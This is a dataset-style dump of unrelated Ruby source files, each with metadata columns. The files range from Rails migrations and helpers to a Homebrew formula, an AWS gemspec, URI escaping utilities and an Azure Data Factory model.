6a243f28a1e26a0c4bc201f493c6f1ce1e5d28ea | 366 | module Stealth
module Services
module Messagebird
class MessagebirdServiceMessage < Stealth::ServiceMessage
attr_accessor :conversation_id,
:messagebird_id,
:platform,
:display_name,
:first_name,
:last_name
end
end
end
end
| 22.875 | 63 | 0.513661 |
088debb33ebea106ca066a3259b82359aae83dc5 | 686 | # Copyright 2014 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
require "simplecov"
gem "minitest"
require "minitest/autorun"
require "minitest/focus"
require "minitest/rg"
| 32.666667 | 74 | 0.765306 |
6245c3e15ff0b0802add9c2b859a83cfa698fa5d | 1,403 | #-- encoding: UTF-8
#-- copyright
# OpenProject is a project management system.
# Copyright (C) 2012-2014 the OpenProject Foundation (OPF)
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License version 3.
#
# OpenProject is a fork of ChiliProject, which is a fork of Redmine. The copyright follows:
# Copyright (C) 2006-2013 Jean-Philippe Lang
# Copyright (C) 2010-2013 the ChiliProject Team
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
#
# See doc/COPYRIGHT.rdoc for more details.
#++
class AddSummaryToProjects < ActiveRecord::Migration
def self.up
add_column :projects, :summary, :text
end
def self.down
remove_column :projects, :summary
end
end
| 35.974359 | 91 | 0.756237 |
61c0bb0cbb43aa64dec2be59a129387f12bdd560 | 1,972 | require 'thread'
require 'timeout'
module Rbgo
using CoRunExtensions
class TaskList
attr_accessor :last_error
def <<(task)
task_queue << task
self
end
def add(task, timeout: nil, skip_on_exception: false)
task_queue << proc do |last_task_result|
begin
Timeout::timeout(timeout) do
task.call(last_task_result)
end
rescue Exception => ex
self.last_error = ex
raise unless skip_on_exception
end
end
self
end
def start(arg = nil)
start_once.do do
_start(arg)
end
nil
end
def clear_task
task_queue.clear
end
def running?
running
end
def complete?
!running? && task_queue.empty?
end
def wakeup
wait_cond.signal
end
def wait(timeout = nil)
wait_mutex.synchronize do
if running?
wait_cond.wait(wait_mutex, timeout)
end
end
end
private
attr_accessor :task_queue, :start_once, :running, :wait_mutex, :wait_cond
def initialize
self.task_queue = Queue.new
self.start_once = Once.new
self.running = false
self.wait_mutex = Mutex.new
self.wait_cond = ConditionVariable.new
end
def notify
wait_mutex.synchronize do
self.running = false
wait_cond.signal
end
end
def _start(arg = nil)
self.last_error = nil unless running?
self.running = true
go(arg) do |last_task_result|
begin
task = task_queue.deq(true)
rescue ThreadError
notify
self.start_once = Once.new
else
begin
res = task.call(last_task_result)
rescue Exception => ex
self.last_error = ex
notify
self.start_once = Once.new
else
_start(res)
end
end
end
end
end
end | 19.333333 | 77 | 0.56643 |
08647c91333c439e68ed1f9dc1be9dc8a9b3dcd8 | 872 | require 'yaml'
def _spawner2(_name, _modelURI, _worldName, _x, _y, _z, _roll, _pitch, _yaw, _additionalSDF='')
base_spawn = `rospack find ctu_cras_norlab_absolem_sensor_config_1`.chomp + "/launch/common.rb"
begin
load base_spawn
rescue LoadError
raise "Unknown robot configuration #{_modelURI}. #{base_spawn} could not be found."
else
max_velocity = 0.6
_spawner(_name, _modelURI, _worldName, _x, _y, _z, _roll, _pitch, _yaw, _additionalSDF, max_velocity)
end
end
def _rosExecutables2(_name, _worldName)
<<-HEREDOC
<executable name='topics'>
<command>roslaunch --wait ctu_cras_norlab_absolem_sensor_config_1 vehicle_topics.launch world_name:=#{_worldName} name:=#{_name} revision:=2021 has_cliff_sensors:=1 description_print_command:="#{File.dirname(__FILE__) + '/../scripts/print_robot_urdf'}"</command>
</executable>
HEREDOC
end
| 37.913043 | 266 | 0.751147 |
26619c222912b6bd99d7070b2fb922c84ab32742 | 319 | require "../lib/Goofy"
require "goofy/contrib"
Goofy.plugin Goofy::Mote
ITEMS = ("A".."Z").to_a
Goofy.send :remove_const, :Response
Goofy::Response = Rack::Response
Goofy.define do
def mote_vars(content)
{ content: content }
end
on default do
res.write view("home", list: ITEMS)
end
end
run Goofy
| 14.5 | 39 | 0.683386 |
4a23e5a825e6ffb1b4416e875ddf5f3bc2052e21 | 1,469 | require 'hanami/utils/file_list'
module Hanami
module Assets
# Requested asset
#
# @since 0.8.0
# @api private
class Asset
# @since 0.8.0
# @api private
PUBLIC_DIRECTORY = Hanami.public_directory.join('**', '*').to_s.freeze
# @since 0.8.0
# @api private
URL_SEPARATOR = '/'.freeze
# @since 0.8.0
# @api private
attr_reader :path
# @since 0.8.0
# @api private
attr_reader :config
# @since 0.8.0
# @api private
attr_reader :original
# @since 0.8.0
# @api private
def initialize(sources, path)
@path = path
@prefix, @config = sources.find { |p, _| path.start_with?(p) }
if @prefix && @config
@original = @config.sources.find(@path.sub(@prefix, ''))
end
end
# @since 0.8.0
# @api private
def precompile?
original && config
end
# @since 0.8.0
# @api private
def exist?
return true unless original.nil?
file_path = path.tr(URL_SEPARATOR, ::File::SEPARATOR)
destination = find_asset do |a|
a.end_with?(file_path)
end
!destination.nil?
end
private
# @since 0.8.0
# @api private
def find_asset
Utils::FileList[PUBLIC_DIRECTORY].find do |asset|
yield asset unless ::File.directory?(asset)
end
end
end
end
end
| 20.402778 | 76 | 0.533696 |
010392ccda2918d171abb36d5fbd9ab7023e31fc | 1,295 | # frozen_string_literal: true
# WARNING ABOUT GENERATED CODE
#
# This file is generated. See the contributing guide for more information:
# https://github.com/aws/aws-sdk-ruby/blob/version-3/CONTRIBUTING.md
#
# WARNING ABOUT GENERATED CODE
Gem::Specification.new do |spec|
spec.name = 'aws-sdk-codepipeline'
spec.version = File.read(File.expand_path('../VERSION', __FILE__)).strip
spec.summary = 'AWS SDK for Ruby - CodePipeline'
spec.description = 'Official AWS Ruby gem for AWS CodePipeline (CodePipeline). This gem is part of the AWS SDK for Ruby.'
spec.author = 'Amazon Web Services'
spec.homepage = 'https://github.com/aws/aws-sdk-ruby'
spec.license = 'Apache-2.0'
spec.email = ['[email protected]']
spec.require_paths = ['lib']
spec.files = Dir['LICENSE.txt', 'CHANGELOG.md', 'VERSION', 'lib/**/*.rb']
spec.metadata = {
'source_code_uri' => 'https://github.com/aws/aws-sdk-ruby/tree/version-3/gems/aws-sdk-codepipeline',
'changelog_uri' => 'https://github.com/aws/aws-sdk-ruby/tree/version-3/gems/aws-sdk-codepipeline/CHANGELOG.md'
}
spec.add_dependency('aws-sdk-core', '~> 3', '>= 3.121.2')
spec.add_dependency('aws-sigv4', '~> 1.1')
spec.required_ruby_version = '>= 2.3'
end
| 39.242424 | 125 | 0.671042 |
625b7f07ac0f3d5f575e271f358d2548a00653aa | 3,130 | class Libspatialite < Formula
desc "Adds spatial SQL capabilities to SQLite"
homepage "https://www.gaia-gis.it/fossil/libspatialite/index"
revision 8
stable do
url "https://www.gaia-gis.it/gaia-sins/libspatialite-sources/libspatialite-4.3.0a.tar.gz"
mirror "https://ftp.netbsd.org/pub/pkgsrc/distfiles/libspatialite-4.3.0a.tar.gz"
mirror "https://www.mirrorservice.org/sites/ftp.netbsd.org/pub/pkgsrc/distfiles/libspatialite-4.3.0a.tar.gz"
sha256 "88900030a4762904a7880273f292e5e8ca6b15b7c6c3fb88ffa9e67ee8a5a499"
patch do
url "https://raw.githubusercontent.com/Homebrew/formula-patches/27a0e51936e01829d0a6f3c75a7fbcaf92bb133f/libspatialite/sqlite310.patch"
sha256 "459434f5e6658d6f63d403a7795aa5b198b87fc9f55944c714180e7de662fce2"
end
end
livecheck do
url "https://www.gaia-gis.it/gaia-sins/libspatialite-sources/"
regex(/href=.*?libspatialite[._-]v?(\d+(?:\.\d+)+[a-z]?)\.t/i)
end
bottle do
cellar :any
sha256 "e8bd429119857fab4cb51f3ba7b64024b51eb2400873e71fc9d6aad297c109ce" => :catalina
sha256 "8fcc2ccaf861f94c3fb41b1c6435e86f52a7fe70e66d9e02a5acb16d285c4360" => :mojave
sha256 "a77ac13e3758d389ccf42fa62d8a7bb528062c215e2b380b8d3df7211696712f" => :high_sierra
end
head do
url "https://www.gaia-gis.it/fossil/libspatialite", using: :fossil
depends_on "autoconf" => :build
depends_on "automake" => :build
depends_on "libtool" => :build
end
depends_on "pkg-config" => :build
depends_on "freexl"
depends_on "geos"
depends_on "libxml2"
depends_on "proj"
# Needs SQLite > 3.7.3 which rules out system SQLite on Snow Leopard and
# below. Also needs dynamic extension support which rules out system SQLite
# on Lion. Finally, RTree index support is required as well.
depends_on "sqlite"
def install
system "autoreconf", "-fi" if build.head?
# New SQLite3 extension won't load via SELECT load_extension("mod_spatialite");
# unless named mod_spatialite.dylib (should actually be mod_spatialite.bundle)
# See: https://groups.google.com/forum/#!topic/spatialite-users/EqJAB8FYRdI
# needs upstream fixes in both SQLite and libtool
inreplace "configure",
"shrext_cmds='`test .$module = .yes && echo .so || echo .dylib`'",
"shrext_cmds='.dylib'"
chmod 0755, "configure"
# Ensure Homebrew's libsqlite is found before the system version.
sqlite = Formula["sqlite"]
ENV.append "LDFLAGS", "-L#{sqlite.opt_lib}"
ENV.append "CFLAGS", "-I#{sqlite.opt_include}"
# Use Proj 6.0.0 compatibility headers.
# Remove in libspatialite 5.0.0
ENV.append_to_cflags "-DACCEPT_USE_OF_DEPRECATED_PROJ_API_H"
args = %W[
--disable-dependency-tracking
--prefix=#{prefix}
--with-sysroot=#{HOMEBREW_PREFIX}
--enable-geocallbacks
]
system "./configure", *args
system "make", "install"
end
test do
# Verify mod_spatialite extension can be loaded using Homebrew's SQLite
pipe_output("#{Formula["sqlite"].opt_bin}/sqlite3",
"SELECT load_extension('#{opt_lib}/mod_spatialite');")
end
end
| 36.823529 | 141 | 0.715335 |
b94a65aa929027eee21337ec0c35b2bcdb77f8e0 | 4,211 | # frozen_string_literal: true
require_relative "error"
module Ensql
class << self
# Get the current connection adapter. If not specified, it will try to
# autoload an adapter based on the availability of Sequel or ActiveRecord,
# in that order.
#
# @example
# require 'sequel'
# Ensql.adapter # => Ensql::SequelAdapter.new
# Ensql.adapter = Ensql::ActiveRecordAdapter.new # override adapter
# Ensql.adapter = my_tsql_adapter # supply your own adapter
#
def adapter
Thread.current[:ensql_adapter] || Thread.main[:ensql_adapter] ||= autoload_adapter
end
# Set the connection adapter to use. Must implement the interface defined in
# {Ensql::Adapter}. This uses a thread-local variable so adapters can be
# switched safely in a multi-threaded web server.
def adapter=(adapter)
if adapter.is_a?(Module) && (adapter.name == "Ensql::SequelAdapter" || adapter.name == "Ensql::ActiveRecordAdapter")
warn "Using `#{adapter}` as an adapter is deprecated, use `#{adapter}.new`.", uplevel: 1
end
Thread.current[:ensql_adapter] = adapter
end
private
def autoload_adapter
if defined? Sequel
require_relative "sequel_adapter"
SequelAdapter.new
elsif defined? ActiveRecord
require_relative "active_record_adapter"
ActiveRecordAdapter.new
else
raise Error, "Couldn't autodetect an adapter, please specify manually."
end
end
end
#
# @abstract Do not use this module directly.
#
# A common interface for executing SQL statements and retrieving (or not)
# their results. Some methods have predefined implementations for convenience
# that can be improved in the adapters.
#
module Adapter
# @!group 1. Interface Methods
# @!method literalize(value)
#
# Convert a Ruby object into a string that can be safely interpolated into
# an SQL statement. Strings will be correctly quoted. The precise result
# will depend on the adapter and the underlying database driver, but most
# RDBMs have limited ways to express literals.
#
# @return [String] a properly quoted SQL literal
#
# @see https://www.postgresql.org/docs/13/sql-syntax-lexical.html#SQL-SYNTAX-CONSTANTS
# @see https://dev.mysql.com/doc/refman/8.0/en/literals.html
# @see https://sqlite.org/lang_expr.html#literal_values_constants_
#
# @example
# literalize("It's quoted") # => "'It''s quoted'"
# literalize(1.23) # => "1.23"
# literalize(true) # => "1"
# literalize(nil) # => "NULL"
# literalize(Time.now) # => "'2021-02-22 23:44:28.942947+1300'"
# @!method fetch_rows(sql)
#
# Execute the query and return an array of rows represented by { column => field }
# hashes. Fields should be deserialised depending on the column type.
#
# @return [Array<Hash>] rows as hashes keyed by column name
# @!method fetch_each_row(sql)
#
# Execute the query and yield each resulting row. This should provide a more
# efficient method of iterating through large datasets.
#
# @yield <Hash> row
# @!method fetch_count(sql)
#
# Execute the statement and return the number of rows affected. Typically
# used for DELETE, UPDATE, INSERT, but will work with SELECT on some
# databases.
#
# @return <Integer> the number of rows affected by the statement
# @!method run(sql)
#
# Execute the statement on the database without returning any result. This
# can avoid the overhead of other fetch_* methods.
#
# @return <void>
# @!group 2. Predefined Methods
# Execute the query and return only the first row of the result.
# @return <Hash>
def fetch_first_row(sql)
fetch_each_row(sql).first
end
# Execute the query and return only the first column of the result.
# @return <Array>
def fetch_first_column(sql)
fetch_rows(sql).map(&:values).map(&:first)
end
# Execute the query and return only the first field of the first row of the result.
def fetch_first_field(sql)
fetch_first_row(sql)&.values&.first
end
end
end
| 33.420635 | 122 | 0.6692 |
616a14265b6ad3ef5656b52f4a2e42709d5466a7 | 12,663 | # A bunch of helpers for efficiently generating select options for taggable
# content, e.g. topics, organisations, etc.
module Admin::TaggableContentHelper
# Returns an Array that represents the current set of taggable topics.
# Each element of the array consists of two values: the name and ID of the
# topic.
def taggable_topics_container
Rails.cache.fetch(taggable_topics_cache_digest, expires_in: 1.day) do
Topic.order(:name).map { |t| [t.name, t.id] }
end
end
# Returns an Array that represents the current set of taggable topical
# events. Each element of the array consists of two values: the name and ID
# of the topical event.
def taggable_topical_events_container
Rails.cache.fetch(taggable_topical_events_cache_digest, expires_in: 1.day) do
TopicalEvent.order(:name).map { |te| [te.name, te.id] }
end
end
# Returns an Array that represents the current set of taggable organisations.
# Each element of the array consists of two values: the select_name and the
# ID of the organisation
def taggable_organisations_container
Rails.cache.fetch(taggable_organisations_cache_digest, expires_in: 1.day) do
Organisation.with_translations.order(:name).map { |o| [o.select_name, o.id] }
end
end
# Returns an Array that represents the current set of taggable ministerial
# role appointments (both past and present). Each element of the array
# consists of two values: a selectable label (consisting of the person, the
# role, the date the role was held if it's in the past, and the organisations
# the person belongs to) and the ID of the role appointment.
def taggable_ministerial_role_appointments_container
Rails.cache.fetch(taggable_ministerial_role_appointments_cache_digest, expires_in: 1.day) do
role_appointments_container_for(RoleAppointment.for_ministerial_roles)
end
end
# Returns an Array that represents the current set of taggable roles (both
# past and present). Each element of the array consists of two values: a
# selectable label (consisting of the person, the role, the date the role was
# held if it's in the past, and the organisations the person belongs to) and
# the ID of the role appointment.
def taggable_role_appointments_container
Rails.cache.fetch(taggable_role_appointments_cache_digest, expires_in: 1.day) do
role_appointments_container_for(RoleAppointment)
end
end
# Returns an Array that represents the taggable ministerial roles. Each
# element of the array consists of two values: the name of the ministerial
# role with the organisation and current holder and its ID.
def taggable_ministerial_roles_container
Rails.cache.fetch(taggable_ministerial_roles_cache_digest, expires_in: 1.day) do
MinisterialRole.with_translations.with_translations_for(:organisations).alphabetical_by_person.map do |role|
["#{role.name}, #{role.organisations.map(&:name).to_sentence} (#{role.current_person_name})", role.id]
end
end
end
  # Returns an Array that represents the current set of taggable detailed
  # guides. Each element of the array consists of two values: the guide title
  # and its ID.
def taggable_detailed_guides_container
Rails.cache.fetch(taggable_detailed_guides_cache_digest, expires_in: 1.day) do
DetailedGuide.alphabetical.latest_edition.active.map {|d| [d.title, d.id] }
end
end
  # Returns an Array that represents the current set of taggable statistical
  # data sets. Each element of the array consists of two values: the data
  # set title and its ID.
def taggable_statistical_data_sets_container
Rails.cache.fetch(taggable_statistical_data_sets_cache_digest, expires_in: 1.day) do
StatisticalDataSet.with_translations.latest_edition.map do |data_set|
[data_set.title, data_set.document_id]
end
end
end
# Returns an Array that represents the taggable published worldwide
# priorities. Each element of the array consists of two values: the
# worldwide priority title and its ID.
def taggable_worldwide_priorities_container
Rails.cache.fetch(taggable_worldwide_priorities_cache_digest, expires_in: 1.day) do
WorldwidePriority.alphabetical.published.map {|w| [w.title, w.id] }
end
end
# Returns an Array that represents the taggable policies. Each element of the
# array consists of two values: the policy title (including topics) and its
# ID.
def taggable_policies_container
Rails.cache.fetch(taggable_policies_cache_digest, expires_in: 1.day) do
Policy.latest_edition.with_translations.includes(:topics).active.map do |policy|
[policy.title_with_topics, policy.id]
end
end
end
# Returns an Array that represents the taggable world locations. Each element
# of the array consists of two values: the location name and its ID
def taggable_world_locations_container
Rails.cache.fetch(taggable_world_locations_cache_digest, expires_in: 1.day) do
WorldLocation.ordered_by_name.map {|w| [w.name, w.id] }
end
end
  # Returns an Array that represents the taggable alternative format providers.
  # Each element of the array consists of two values: the label (organisation
  # and the email address if available) and the ID of the organisation.
def taggable_alternative_format_providers_container
Rails.cache.fetch(taggable_alternative_format_providers_cache_digest, expires_in: 1.day) do
Organisation.alphabetical.map do |o|
["#{o.name} (#{o.alternative_format_contact_email.blank? ? "-" : o.alternative_format_contact_email})", o.id]
end
end
end
# Returns an Array representing the taggable document collections and their
# groups. Each element of the array consists of two values: the
# collection/group name and the ID of the group.
def taggable_document_collection_groups_container
Rails.cache.fetch(taggable_document_collection_groups_cache_digest, expires_in: 1.day) do
DocumentCollection.latest_edition.alphabetical.includes(:groups).flat_map do |collection|
collection.groups.map { |group| ["#{collection.title} (#{group.heading})", group.id] }
end
end
end
# Returns an Array that represents the taggable worldwide organisations.
# Each element of the array consists of two values: the name of the worldwide
# organisation and its ID.
def taggable_worldwide_organisations_container
Rails.cache.fetch(taggable_worldwide_organisations_cache_digest, expires_in: 1.day) do
WorldwideOrganisation.with_translations.all.map {|wo| [wo.name, wo.id] }
end
end
# Returns an MD5 digest representing the current set of taggable topics. This
# will change if any of the Topics should change or if a new topic is added.
def taggable_topics_cache_digest
@_taggable_topics_cache_digest ||= calculate_digest(Topic.order(:id), 'topics')
end
# Returns an MD5 digest representing the current set of taggable topical
# events. This will change if any of the TopicalEvents should change or if a
# new topical event is added.
def taggable_topical_events_cache_digest
@_taggable_topical_events_cache_digest ||= calculate_digest(TopicalEvent.order(:id), 'topical-events')
end
# Returns an MD5 digest representing the current set of taggable
# organisations. This will change if any of the Organisations should change
# or if a new organisation is added.
def taggable_organisations_cache_digest
@_taggable_organisations_cache_digest ||= calculate_digest(Organisation.order(:id), 'organisations')
end
# Returns an MD5 digest representing the current set of taggable ministerial
# role appointments. This will change if any role appointments are added or
# changed, and also if an occupied MinisterialRole is updated.
def taggable_ministerial_role_appointments_cache_digest
  @_taggable_ministerial_role_appointments_cache_digest ||=
    calculate_digest(
      RoleAppointment.joins(:role).where(roles: { type: MinisterialRole }).order("role_appointments.id"),
      'ministerial-role-appointments')
end
# Returns an MD5 digest representing the current set of taggable role
# appointments. This will change if any role appointments are added or
# changed, and also if an occupied Role is updated.
def taggable_role_appointments_cache_digest
@_taggable_role_appointments_cache_digest ||= calculate_digest(RoleAppointment.order(:id), 'role-appointments')
end
# Returns an MD5 digest representing the current set of taggable ministerial
# role appointments. This will change if any ministerial role is added or
# updated.
def taggable_ministerial_roles_cache_digest
@_taggable_ministerial_roles_cache_digest ||= calculate_digest(MinisterialRole.order(:id), 'ministerial-roles')
end
# Returns an MD5 digest representing all the detailed guides. This will change
# if any detailed guides are added or updated.
def taggable_detailed_guides_cache_digest
@_taggable_detailed_guides_cache_digest ||= calculate_digest(Document.where(document_type: DetailedGuide).order(:id), 'detailed-guides')
end
# Returns an MD5 digest representing the taggable statistical data sets. This
# will change if any statistical data set is added or updated.
def taggable_statistical_data_sets_cache_digest
@_taggable_statistical_data_sets_cache_digest ||= calculate_digest(Document.where(document_type: StatisticalDataSet).order(:id), 'statistical-data-sets')
end
# Returns an MD5 digest representing the taggable worldwide priorities. This
# will change if any worldwide priorities are added or updated.
def taggable_worldwide_priorities_cache_digest
@_taggable_worldwide_priorities_cache_digest ||= calculate_digest(Document.where(document_type: WorldwidePriority).order(:id), 'worldwide-priorities')
end
# Returns an MD5 digest representing the taggable policies. This will change
# if any policies are added or updated.
def taggable_policies_cache_digest
@_taggable_policies_cache_digest ||= calculate_digest(Document.where(document_type: Policy).order(:id), 'policies')
end
# Returns an MD5 digest representing the taggable world locations. This will
# change if any world locations are added or updated.
def taggable_world_locations_cache_digest
@_taggable_world_locations_cache_digest ||= calculate_digest(WorldLocation.order(:id), 'world-locations')
end
# Returns an MD5 digest representing the taggable alternative format
# providers. This will change if any alternative format providers are
# changed.
def taggable_alternative_format_providers_cache_digest
@_taggable_alternative_format_providers_cache_digest ||= calculate_digest(Organisation.order(:id), 'alternative-format-providers')
end
# Returns an MD5 digest representing the taggable document collection
# groups. This will change if any document collection or group within
# the collection is changed or any new ones are added.
# NOTE(review): the digest tracks Document records only; confirm that group
# edits touch the parent document, otherwise group-only changes will not
# bust this cache.
def taggable_document_collection_groups_cache_digest
@_taggable_document_collection_groups_cache_digest ||= calculate_digest(Document.where(document_type: DocumentCollection).order(:id), 'document-collection-groups')
end
# Returns an MD5 digest representing the taggable worldwide organisations.
# This will change if any worldwide organisations are added or updated.
def taggable_worldwide_organisations_cache_digest
@_taggable_worldwide_organisations_cache_digest ||= calculate_digest(WorldwideOrganisation.order(:id), 'worldwide-organisations')
end
# Note: Taken from Rails 4
# Fragment-caches the block under +name+ when +condition+ is truthy,
# otherwise runs the block uncached. Always returns nil so nothing is
# accidentally rendered from the helper's return value.
def cache_if(condition, name = {}, options = nil, &block)
  condition ? cache(name, options, &block) : yield
  nil
end
private
# Builds an MD5 digest for the records in +scope+, namespaced by
# +digest_name+. The digest changes whenever any record's updated_at
# timestamp changes, making it suitable as a cache key.
def calculate_digest(scope, digest_name)
  timestamps = scope.pluck(:updated_at).map(&:to_i).join
  Digest::MD5.hexdigest "taggable-#{digest_name}-#{timestamps}"
end
# Maps each role appointment in +scope+ to a [label, id] pair for use in a
# select control. Eager-loads the person and translated organisation/role
# associations to avoid N+1 queries while building the labels.
def role_appointments_container_for(scope)
scope.
includes(:person).
with_translations_for(:organisations).
with_translations_for(:role).
alphabetical_by_person.map { |appointment| [role_appointment_label(appointment), appointment.id] }
end
# Builds the human-readable label "person, role, organisations" for a role
# appointment; past appointments get their date range appended to the role.
def role_appointment_label(appointment)
  organisation_names = appointment.organisations.map(&:name).to_sentence
  person_name = appointment.person.name
  role_name = appointment.role.name.dup
  unless appointment.current?
    role_name << " (#{l(appointment.started_at.to_date)} to #{l(appointment.ended_at.to_date)})"
  end
  [person_name, role_name, organisation_names].join(', ')
end
end
module ActionDispatch
module Journey # :nodoc:
class Router # :nodoc:
class Utils # :nodoc:
  # Normalizes a URI path:
  #
  # * ensures a leading slash and collapses runs of slashes
  # * strips trailing slashes
  # * upcases percent-escapes ("%ab" => "%AB")
  # * returns "/" for an empty path
  #
  #   normalize_path("/foo")  # => "/foo"
  #   normalize_path("/foo/") # => "/foo"
  #   normalize_path("foo")   # => "/foo"
  #   normalize_path("")      # => "/"
  #   normalize_path("/%ab")  # => "/%AB"
  #
  # The result is tagged with the encoding of the input path.
  def self.normalize_path(path)
    encoding = path.encoding
    normalized = "/#{path}".squeeze("/".freeze)
    normalized = normalized.sub(%r{/+\Z}, "".freeze)
    normalized = normalized.gsub(/%[a-f0-9]{2}/) { |escape| escape.upcase }
    normalized = "/".dup if normalized == "".freeze
    normalized.force_encoding(encoding)
  end

  # URI path and fragment escaping
  # http://tools.ietf.org/html/rfc3986
  class UriEncoder # :nodoc:
    ENCODE = "%%%02X".freeze
    US_ASCII = Encoding::US_ASCII
    UTF_8 = Encoding::UTF_8
    EMPTY = "".dup.force_encoding(US_ASCII).freeze
    DEC2HEX = (0..255).to_a.map { |i| ENCODE % i }.map { |s| s.force_encoding(US_ASCII) }
    ALPHA = "a-zA-Z".freeze
    DIGIT = "0-9".freeze
    UNRESERVED = "#{ALPHA}#{DIGIT}\\-\\._~".freeze
    SUB_DELIMS = "!\\$&'\\(\\)\\*\\+,;=".freeze
    ESCAPED = /%[a-zA-Z0-9]{2}/.freeze
    FRAGMENT = /[^#{UNRESERVED}#{SUB_DELIMS}:@\/\?]/.freeze
    SEGMENT = /[^#{UNRESERVED}#{SUB_DELIMS}:@]/.freeze
    PATH = /[^#{UNRESERVED}#{SUB_DELIMS}:@\/]/.freeze

    def escape_fragment(fragment)
      escape(fragment, FRAGMENT)
    end

    def escape_path(path)
      escape(path, PATH)
    end

    def escape_segment(segment)
      escape(segment, SEGMENT)
    end

    # Decodes every %XX escape. The result keeps the input's encoding,
    # except that US-ASCII input is promoted to UTF-8 (decoded bytes may
    # form multi-byte characters).
    def unescape_uri(uri)
      target_encoding = uri.encoding == US_ASCII ? UTF_8 : uri.encoding
      uri.gsub(ESCAPED) { |match| [match[1, 2].hex].pack("C") }.force_encoding(target_encoding)
    end

    private
      # Percent-encodes every character of +component+ matched by +pattern+.
      def escape(component, pattern)
        component.gsub(pattern) { |unsafe| percent_encode(unsafe) }.force_encoding(US_ASCII)
      end

      # Expands each byte of +unsafe+ to its uppercase %XX form.
      def percent_encode(unsafe)
        encoded = EMPTY.dup
        unsafe.each_byte { |byte| encoded << DEC2HEX[byte] }
        encoded
      end
  end

  ENCODER = UriEncoder.new

  def self.escape_path(path)
    ENCODER.escape_path(path.to_s)
  end

  def self.escape_segment(segment)
    ENCODER.escape_segment(segment.to_s)
  end

  def self.escape_fragment(fragment)
    ENCODER.escape_fragment(fragment.to_s)
  end

  # Replaces any escaped sequences with their unescaped representations.
  #
  #   uri = "/topics?title=Ruby%20on%20Rails"
  #   unescape_uri(uri)  #=> "/topics?title=Ruby on Rails"
  def self.unescape_uri(uri)
    ENCODER.unescape_uri(uri)
  end
end
end
end
end
# encoding: utf-8
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
module Azure::DataFactory::Mgmt::V2018_06_01
module Models
#
# A copy activity Phoenix server source.
#
class PhoenixSource < TabularSource
include MsRestAzure
# Sets the polymorphic discriminator consumed by the REST serializer.
def initialize
@type = "PhoenixSource"
end
# Polymorphic discriminator for serialization; always "PhoenixSource".
attr_accessor :type
# @return A query to retrieve data from source. Type: string (or
# Expression with resultType string).
attr_accessor :query
#
# Mapper for PhoenixSource class as Ruby Hash.
# This will be used for serialization/deserialization.
#
# Inherited TabularSource/CopySource properties (retry count/wait, query
# timeout, etc.) are declared here as loosely-typed 'Object' entries
# because they may hold either literals or Expression hashes.
def self.mapper()
{
client_side_validation: true,
required: false,
serialized_name: 'PhoenixSource',
type: {
name: 'Composite',
class_name: 'PhoenixSource',
model_properties: {
additional_properties: {
client_side_validation: true,
required: false,
type: {
name: 'Dictionary',
value: {
client_side_validation: true,
required: false,
serialized_name: 'ObjectElementType',
type: {
name: 'Object'
}
}
}
},
source_retry_count: {
client_side_validation: true,
required: false,
serialized_name: 'sourceRetryCount',
type: {
name: 'Object'
}
},
source_retry_wait: {
client_side_validation: true,
required: false,
serialized_name: 'sourceRetryWait',
type: {
name: 'Object'
}
},
max_concurrent_connections: {
client_side_validation: true,
required: false,
serialized_name: 'maxConcurrentConnections',
type: {
name: 'Object'
}
},
type: {
client_side_validation: true,
required: true,
serialized_name: 'type',
type: {
name: 'String'
}
},
query_timeout: {
client_side_validation: true,
required: false,
serialized_name: 'queryTimeout',
type: {
name: 'Object'
}
},
query: {
client_side_validation: true,
required: false,
serialized_name: 'query',
type: {
name: 'Object'
}
}
}
}
}
end
end
end
end
# frozen_string_literal: true
# Controller concern: exposes the Warden-backed current user, wires the
# authentication around-filter, and provides authorization guard helpers.
module CurrentUser
  extend ActiveSupport::Concern

  included do
    helper_method :current_user
    around_action :login_user

    # we record with reliable reset
    skip_before_action :set_paper_trail_enabled_for_controller
    skip_before_action :set_paper_trail_controller_info
  end

  private

  # Memoizes the user fetched from the Warden session (nil when logged out).
  def current_user
    @current_user ||= warden.user
  end

  # Called from SessionsController for OmniAuth
  def current_user=(user)
    warden.set_user(user, event: :authentication)
  end

  def logout!
    warden.logout
  end

  # Around-filter: authenticate, then run the action with PaperTrail
  # attributing changes to the current user.
  def login_user
    unauthorized! unless warden.authenticate
    PaperTrail.with_whodunnit_user(current_user) { yield }
  end

  def warden
    request.env['warden']
  end

  # Aborts the request via throw(:warden); the Warden::Manager middleware
  # catches this and invokes UnauthorizedController.
  def unauthorized!
    Rails.logger.warn "Halted as unauthorized! threw :warden (called from #{caller.first.sub(Rails.root.to_s, '')})"
    throw :warden
  end

  def authorize_super_admin!
    unauthorized! unless current_user.super_admin?
  end

  def authorize_admin!
    unauthorized! unless current_user.admin?
  end

  def authorize_project_admin!
    unauthorized! unless current_user.admin_for?(current_project)
  end

  def authorize_deployer!
    unauthorized! unless current_user.deployer?
  end

  def authorize_project_deployer!
    unauthorized! unless current_user.deployer_for?(current_project)
  end

  # tested via access checks in the actual controllers
  def authorize_resource!
    case controller_name
    when 'builds'
      authorize_project_deployer!
    when 'locks'
      @project ? authorize_project_deployer! : authorize_admin!
    when 'users'
      if %w[index show].include?(action_name)
        authorize_admin!
      else
        authorize_super_admin!
      end
    else
      raise "Unsupported controller"
    end
  end
end
class AddUniqueConstraintToProfessionalLearningPartners < ActiveRecord::Migration[5.0]
# Replaces the index on :name with a composite unique index on
# [:name, :contact_id].
def change
  change_table :professional_learning_partners do |partners|
    partners.remove_index column: :name
    partners.index [:name, :contact_id], unique: true
  end
end
end
